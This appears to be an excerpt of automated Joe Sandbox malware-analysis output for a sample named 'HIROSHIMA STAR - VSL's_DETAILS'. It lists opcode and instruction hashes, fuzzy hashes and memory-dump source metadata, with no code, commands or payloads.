                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 64339aaa28e10a6159975954608dfa8424f5543b43117883a3c6900c12d38663
                                                                                                                                                                      • Instruction ID: 508e5d790734ce42275834389406e712c66470415a990d5287285059358e93ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 64339aaa28e10a6159975954608dfa8424f5543b43117883a3c6900c12d38663
                                                                                                                                                                      • Instruction Fuzzy Hash: 93115E74D0030A9FCB02CFE9EA549AEBBB1FF49310F108466D924A7350D7355A56DF91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0ad7fa56d226d2826611feaca9e5bff7895db0a0189d85696b4e5a6def9836cd
                                                                                                                                                                      • Instruction ID: 510ed6364b70c71653e313f8a1b0c9e84bf4d0f11030955d654f7da786148ed8
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ad7fa56d226d2826611feaca9e5bff7895db0a0189d85696b4e5a6def9836cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF0F631700A104B8B176A3E9854A2AB6DEEFC8AD53054079EA0BC7365EF20CC038390
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0166c16f97b6c817d3af4506eec8c86e453390ca227303e0beebff4fc705c8b1
                                                                                                                                                                      • Instruction ID: 996a92d12f5d083e3094100bac3ed25641fa1d8a30884a0929ea38c079fe233b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0166c16f97b6c817d3af4506eec8c86e453390ca227303e0beebff4fc705c8b1
                                                                                                                                                                      • Instruction Fuzzy Hash: 96E0DF32E15326CBCB01EBF0EC100EFB734AE82221B49865BC0A437190EB306219C7A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b32a1f8f4130585dbb0988a0bdae9df688154835927f46d42b6a32f2860838bd
                                                                                                                                                                      • Instruction ID: f3623aab031b3bd3be7644a869c5f2e276f4f168c462537d9cec04690f64e6ed
                                                                                                                                                                      • Opcode Fuzzy Hash: b32a1f8f4130585dbb0988a0bdae9df688154835927f46d42b6a32f2860838bd
                                                                                                                                                                      • Instruction Fuzzy Hash: D3E0C2318083490ECB53B738EE1D1247F3BDA612007944A79D0068E76BEF68CC8A4750
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
                                                                                                                                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 354eff9dc01a5d0089bafb61706001d6931c03cbb13e569239b2b74d96a72329
                                                                                                                                                                      • Instruction ID: 0e7b8fd87b0d176c11c0fd6be942f8dada189d31d08d20efa4bf8e3b2ef5cc5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 354eff9dc01a5d0089bafb61706001d6931c03cbb13e569239b2b74d96a72329
                                                                                                                                                                      • Instruction Fuzzy Hash: BED0E235E0020CCBCF21EFA8E4844DDBB71EB48321B10502AD926A3212C6345450CF41
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 820ae64f44077fda13a7098325786a153fbb9d488c7e31faf5276809422943bc
                                                                                                                                                                      • Instruction ID: e2acb9ee91099ef18ff735d8c9a41ff0cf4eb1926a2dbd75f7525f26905734ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 820ae64f44077fda13a7098325786a153fbb9d488c7e31faf5276809422943bc
                                                                                                                                                                      • Instruction Fuzzy Hash: E6D0673AB41018DFCB149F99E8408DDF7B6FB98221B148116E915A3265C631A925DB64
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 77e30d7a6680b8900c4a677d28f30bab4b6cc8425c3359d69e5fe808988e68c7
                                                                                                                                                                      • Instruction ID: f547506f3d5502d8871053fd1329b9e694e468c2b0654b2073fae7d662dfa8c1
                                                                                                                                                                      • Opcode Fuzzy Hash: 77e30d7a6680b8900c4a677d28f30bab4b6cc8425c3359d69e5fe808988e68c7
                                                                                                                                                                      • Instruction Fuzzy Hash: 92C012300443094EC641F766ED45555776EE7A0600750863490050A75DDF78ACCA4694
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: .5vq
                                                                                                                                                                      • API String ID: 0-493797296
                                                                                                                                                                      • Opcode ID: 67c90f3ce8b4d7b7da490b7207d2f8d2b63cb9d7c7edc840c2086fc4979314f8
                                                                                                                                                                      • Instruction ID: 6408d880b564c3465a2d4f0cb3e3f949726f96de86999ad1f8bab77f086922b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 67c90f3ce8b4d7b7da490b7207d2f8d2b63cb9d7c7edc840c2086fc4979314f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 60628D74E01229CFDB64DF69C984B9DBBB2BB89300F1085E9D409A7354DB35AE85CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 24fc63212cfb9bdf04cc1e9e4715d8d265d86c321b4b621b62bf6ef1fbf0f7dc
                                                                                                                                                                      • Instruction ID: 631cb2af8fa4ee57a85f46f366613f0ab57c26dbfca86687df93237ed7ca82af
                                                                                                                                                                      • Opcode Fuzzy Hash: 24fc63212cfb9bdf04cc1e9e4715d8d265d86c321b4b621b62bf6ef1fbf0f7dc
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CC17D74E01218CFDB54DFA5C994B9DBBB2BF89300F2481A9D809AB364DB359E85CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 30be510c567efe48cb348967758e0a64a1bdf5d60a884f8a595d2b226cc3c587
                                                                                                                                                                      • Instruction ID: 2e2ee236e593b2244ad1b1ff9215e05f8f2e32a7cef78a0a772e52207dbd11f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 30be510c567efe48cb348967758e0a64a1bdf5d60a884f8a595d2b226cc3c587
                                                                                                                                                                      • Instruction Fuzzy Hash: 2EC18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB359E85CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 07b67adeb95b6c755fd207234f0c982b403271818beb205ab97751deded62732
                                                                                                                                                                      • Instruction ID: 9f6df621f6f335f7000a16b892ee11623808afcbe99088ec167092ec16816949
                                                                                                                                                                      • Opcode Fuzzy Hash: 07b67adeb95b6c755fd207234f0c982b403271818beb205ab97751deded62732
                                                                                                                                                                      • Instruction Fuzzy Hash: 11C18E74E01218CFDB54DFA5C994B9DBBB2AF89300F2081A9D809AB365DB359E85CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9cecf46424649343442d26dfea720f49671d29330a44d3724112c9d76a5fa48e
                                                                                                                                                                      • Instruction ID: e4c7f9ad6297a926aa66e36f83d8a90037e72d3deb031be7f5ca94e4b6451a89
                                                                                                                                                                      • Opcode Fuzzy Hash: 9cecf46424649343442d26dfea720f49671d29330a44d3724112c9d76a5fa48e
                                                                                                                                                                      • Instruction Fuzzy Hash: A1A18B74A01229CFDB65DF24C994B9ABBB2BF4A300F5085EAD40DA7350DB35AE81CF51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 391fc1770c23a75e396de578ff4f6775b41ca3acecaecf5a8238dc18574dd4d0
                                                                                                                                                                      • Instruction ID: b5ce1fb104c58fe7fc9c92fa4de0636167c93f4062459c5feac6c9c31b6e0c24
                                                                                                                                                                      • Opcode Fuzzy Hash: 391fc1770c23a75e396de578ff4f6775b41ca3acecaecf5a8238dc18574dd4d0
                                                                                                                                                                      • Instruction Fuzzy Hash: EE519274A01229CFCB65DF24C994B99BBB2FF49301F5085EAD40AA7350DB35AE81CF51
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                                      • API String ID: 0-3001612457
                                                                                                                                                                      • Opcode ID: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
                                                                                                                                                                      • Instruction ID: eac3cc1a84da2dbb22483cac21a205656304a305653561dd37229b2fbb5ff543
                                                                                                                                                                      • Opcode Fuzzy Hash: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D019E32B401088F8F298E2CC564A2D33EEABB8AA07154469E647CF3B4DA21DC41C750